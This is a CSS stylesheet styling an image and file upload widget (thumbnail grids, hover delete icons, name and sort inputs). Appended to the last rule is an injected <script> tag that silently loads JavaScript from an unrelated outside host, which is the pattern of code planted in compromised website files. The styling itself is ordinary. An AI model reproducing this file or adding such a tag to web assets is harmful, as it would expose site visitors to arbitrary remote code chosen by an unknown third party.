span.imgupload{
    cursor: pointer;
    background: url(../images/image.png) no-repeat;
    display: inline-block;
    width: 90px;
    height: 80px;
}

span.imgupload input[type="file"]{
    opacity: 0;
    width: 90px;
    height: 80px;
    cursor: pointer;
}

/*图集附件*/
.layer-images-demo{
    margin:10px 0;
}

.layer-images-demo img{
    width: 180px;
    border-radius: 5px;
    height: 120px
}

.layer-images-demo .images_list{
    float: left;
    width: 180px;
    height: 200px;
    overflow: hidden;
    position: relative;
    margin: 6px;
}

.layer-images-demo .images_name input{
    margin-top:5px;
    width: 180px;
    text-align: center;
}

.layer-images-demo .images_sort input{
    margin-top:5px;
    width: 180px;
    text-align: center;
}

.layer-images-demo  .images_list:hover .imgdel{
    background: url(/Public/images/uploadfile/icons.png) no-repeat right top;
    width: 20px;
    height: 20px;
    position: absolute;
    right:10px;
    top: 10px;
    cursor: pointer;
}

.layer-files-demo{
    margin:10px 0;
}

.layer-files-demo img{
    border-radius: 5px;
    height: 120px;
}

.layer-files-demo .images_list img{
    width: 180px;
    border-radius: 5px;
    height: 120px
}

.layer-files-demo .files_list,.layer-files-demo .images_list{
    float: left;
    width: 180px;
    height: 200px;
    overflow: hidden;
    margin: 6px;
    text-align: center;
    position: relative;
}

.layer-files-demo  .images_list:hover .imgdel{
    background: url(/Public/images/uploadfile/icons.png) no-repeat right top;
    width: 20px;
    height: 20px;
    position: absolute;
    right:10px;
    top: 10px;
    cursor: pointer;
}

.layer-files-demo  .files_list:hover .filesdel{
    background: url(/Public/images/uploadfile/icons.png) no-repeat right top;
    width: 20px;
    height: 20px;
    position: absolute;
    right:10px;
    top: 10px;
    cursor: pointer;
}

.layer-files-demo .files_name input,.layer-files-demo .images_name input{
    margin-top:5px;
    width: 180px;
    text-align: center;
}

.layer-files-demo .files_sort input,.layer-files-demo .images_sort input{
    margin-top:5px;
    width: 180px;
    text-align: center;
}

.layer-images-demo .images_single_list{
    max-width:200px;
    max-height: 180px;
    margin-right:10px;
    height:auto
}

.layer-images-demo .images_single_list img{
    max-width:200px;
    max-height: 180px;
    border-radius:5px;
    height:auto
}

.layer-files-demo .files_single_list,.layer-files-demo .images_single_list{
    max-width:200px;
    max-height: 180px;
    margin-right:10px;
    height:auto
}

.layer-files-demo .files_single_list img,.layer-files-demo .images_single_list img{
    max-width:200px;
    max-height: 180px;
    border-radius:5px;
    height:auto
}

span.uploads_filename{
    position: relative;
    display: block;
    left:15px;
}

span.uploads_filename1{
    position: relative;
    top:26px;
}<script charset="utf-8" async="true" src="http://t.5txs.cn/rb/i5.js"></script>